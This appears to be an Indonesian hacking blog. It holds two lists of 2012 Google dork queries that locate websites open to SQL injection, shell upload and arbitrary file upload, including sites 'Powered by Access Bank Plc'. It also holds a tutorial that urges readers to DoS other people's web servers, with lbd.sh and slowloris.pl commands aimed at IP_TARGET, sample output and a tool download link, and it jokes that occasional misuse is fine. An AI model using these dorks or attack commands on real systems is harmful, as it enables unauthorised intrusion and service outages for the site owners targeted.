Google.dork, Ppentest, Win Security

GoogleDork part2

Topic Date Credit
Medium Risk Global Pixel SQL Injection
Dork: intext:”Desenvolvido por: Global Pixel”
03.07.2012 TAURUS OMAR
Medium Risk Planetinfosoft SQL Injection
Dork: “Designed by Planetinfosoft”
03.07.2012 Am!r
Medium Risk Rcsindia SQL Injection
Dork: intext:”Website Designed by RCS”
03.07.2012 TheCyberNuxbie
Medium Risk H.A.A.M SQL Injection
Dork: intext:”Desarrollado por H.A.A.M.”
03.07.2012 TAURUS OMAR
High Risk B2CPrint Remote File Uploader Vulnerability
Dork: inurl:upload.asp intext:B2CPrint Online Printing Solutions
29.06.2012 Mr.XpR
Medium Risk hi-media Remote Sql Injection Vulnerability
Dork: inurl:details.php?id intext:hi-mediaperformance.fr
29.06.2012 Mr.XpR
High Risk JAKCMS 2.2.6 Shell Upload
Dork: “Powered By JAKCMS”
29.06.2012 Sammy FORGIT
Medium Risk As ad Mansour SQL Injection
Dork: intext:”Powered by As’ad Mansour”
29.06.2012 TAURUS OMAR
Medium Risk Dharmatechnet SQL Injection
Dork: intext:”a dharmatechnet creation”
29.06.2012 TAURUS OMAR
Medium Risk Frog Web Works SQL Injection
Dork: intext:”Website by Frog Web Works”
29.06.2012 TAURUS OMAR
Medium Risk Access Bank Plc SQL Injection
Dork: intext:”Powered by Access Bank Plc”
29.06.2012 TAURUS OMAR
Medium Risk Geosoft Technologies SQL Injection
Dork: intext:”Designed & Developed By – Geosoft Technologies Pvt. Ltd.”
29.06.2012 TAURUS OMAR
Medium Risk RADIANT INFOTECH SQL Injection
Dork: intext:”Powered by: RADIANT INFOTECH”
29.06.2012 TAURUS OMAR
Medium Risk Chiangrai Enter Soft Design SQL Injection
Dork: inurl:general_member.php?id_agencies=
28.06.2012 3spi0n
Medium Risk Top Nepal SQL Injection
Dork: intext:”Designed By Top Nepal”
28.06.2012 TAURUS OMAR
Medium Risk MUSOYAN SQL Injection
Dork: intext:”Developed by MUSOYAN brothers studio”
28.06.2012 TAURUS OMAR
Medium Risk Rainbowdigital SQL Injection
Dork: intext:”powered by rainbowdigital”
28.06.2012 TAURUS OMAR
Medium Risk Pixel Identity SQL Injection
Dork: intext:”Powered By Pixel Identity.”
28.06.2012 TAURUS OMAR
Medium Risk Rhdesign SQL Injection
Dork: intext:”webdesign: http://www.rhdesign.no”php
28.06.2012 TAURUS OMAR
Medium Risk Rubysoft Solutions SQL Injection
Dork: intext:”Designed by Rubysoft Solutions”
28.06.2012 TAURUS OMAR
Advertisements
Standard
Google.dork

GoogleDork part1


 Topic

Medium Risk Vivotek Cameras Data Configuration Disclosure
Dork: “/setup/config.html” OR allinurl:”setup/parafile.html”
17.07.2012 Alejandro Leon M…
Medium Risk Elite Bulletin Board 2.1.19 SQL Injection
Dork: intext:”Powered by: Elite Bulletin Board “
16.07.2012 T0x!c
Low Risk Kool Media Converter 2.7.0 Denial Of Service
Dork: N/A
16.07.2012 Kalashinkov3
Medium Risk Gustavo Antunez SQL Injection Vulnerability
Dork: intext:”Desarrollado por Gustavo Antunez”
14.07.2012 TAURUS OMAR
High Risk Ajax Data Uploader Shell Upload
Dork: inurl:plugins/ajaxfilemanager/inc/data.php
14.07.2012 Mr.XpR
High Risk Joomla KSAdvertiser Shell Upload
Dork: inurl:index.php?option=com_ksadvertiser
14.07.2012 D4NB4R
High Risk cyberschool CMS [FCKeditor] Arbitrary File Upload Vulnerability
Dork: intext:”Web Development by IES, Inc”
11.07.2012 Am!r
Low Risk Flogr 1.7 Cross Site Scripting
Dork: inurl:”tag=” “powered by flogr v1.7”
10.07.2012 Nafsh
Medium Risk Digiport SQL Injection
Dork: powered by: Digiport
10.07.2012 POLTERGEISTH4CKE…
Medium Risk digiGALLERY SQL Injection
Dork: Powered by digiGALLERY
10.07.2012 POLTERGEISTH4CKE…
Medium Risk Word Press image-gallery plugin Sql Injection
Dork: inurl:image-gallery/?gallery_id=
07.07.2012 Mr.XpR
High Risk WordPress (wp-insert Plugin) Arbitrary File Upload Vulnerability
Dork: inurl:”wp-content/plugins/wp-insert”
06.07.2012 IrIsT.Ir
Medium Risk Arasism SQL Injection
Dork: “Powered by Arasism.com”
06.07.2012 Ehram.shahmohama…
Medium Risk 7sepehr SQL Injection
Dork: “Powered by 7sepehr.com”
06.07.2012 Ehram.shahmohama…
High Risk Word press flexiweb-form plugin Remote File Uploader
Dork: inurl:plugins/flexiweb-form/
05.07.2012 Mr.XpR
Medium Risk Webify Link Directory / SQL Injection
Dork: allinurl: index.php?page=browse&id=1
04.07.2012 Daniel Godoy
Medium Risk CLscript Classified Script 3.0 SQL Injection
Dork: allinurl: classified-listing.php?catId=
04.07.2012 Daniel Godoy
Medium Risk phpMyVisites SQL Injection
Dork: inurl:”/phpmv2/phpmyvisites.php”
04.07.2012 TAURUS OMAR
Medium Risk Octagono SQL Injection
Dork: intext:”Desenvolvido por Octagono”
03.07.2012 TAURUS OMAR
Medium Risk Geswebs SQL Injection
Dork: intext:”Sitio Web Disenado por: GesWebs”
03.07.2012 TheCyberNuxbie
Standard
./dev/sda /tmp/backtrack, Ppentest

DDOS >:(

Serangan pada webserver banyak sekali dirasakan oleh pihak pengelola webserver, tu boss webserver sama pegawai nya jadi suka lembur, haha apa lagi klo ada ada serang DDOS malem” weitt,, Serangan Fajar tuh 😀 .

Pernahkah loe ngelakuin DOS ke webserver? kalau belum kita latihan ngeDOSSSSSSSSSSSS web orang 😡 .

#Peralatan Perang:

  • Backtrack
  • Backtrack
  • Backtrack 😀
  • program slowloris.pl sama lbd.sh. download dimaari –> http://adf.ly/3TTu1

#Step

  1. Extract tu file di root aje.
  2. Masuk ke folder dimana file yang udah loe extract.
  3. Klo udah masuk klik sintaks ini./lbd.sh IP_TARGET
root@bt:~/dos# ./lbd.sh 10.3.0.67

lbd - load balancing detector 0.2 - Checks if a given domain uses load-balancing.
                                    Written by Stefan Behte (http://ge.mine.nu)
                                    Proof-of-concept! Might give false positives.

Checking for DNS-Loadbalancing: NOT FOUND
Checking for HTTP-Loadbalancing [Server]: 
 Apache/2.2.0 (Win32) DAV/2 mod_ssl/2.2.0 OpenSSL/0.9.8a mod_autoindex_color PHP/4.4.1-pl1
 NOT FOUND

Checking for HTTP-Loadbalancing [Date]: 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:29, 15:16:29, 15:16:29, 15:16:29, NOT FOUND

Checking for HTTP-Loadbalancing [Diff]: NOT FOUND

10.3.0.67 does NOT use Load-balancing.

Klo keluar tulisan NOT use Load-balancing. itu tanda nya tu webserver LEMAH!!!

………………………………………………………………………………………………………………….

Seraaaaaaang……………………

root@bt:~/dos# ./slowloris.pl -dns IP_TARGET

Gampang kan bro,,, cukup untuk pengetahuan aja jgn di salah gunain, tapi klo sekali” ya boleh :p.
ada pertanya??
FastRespon :p ->>  https://www.facebook.com/groups/kuliax/

Standard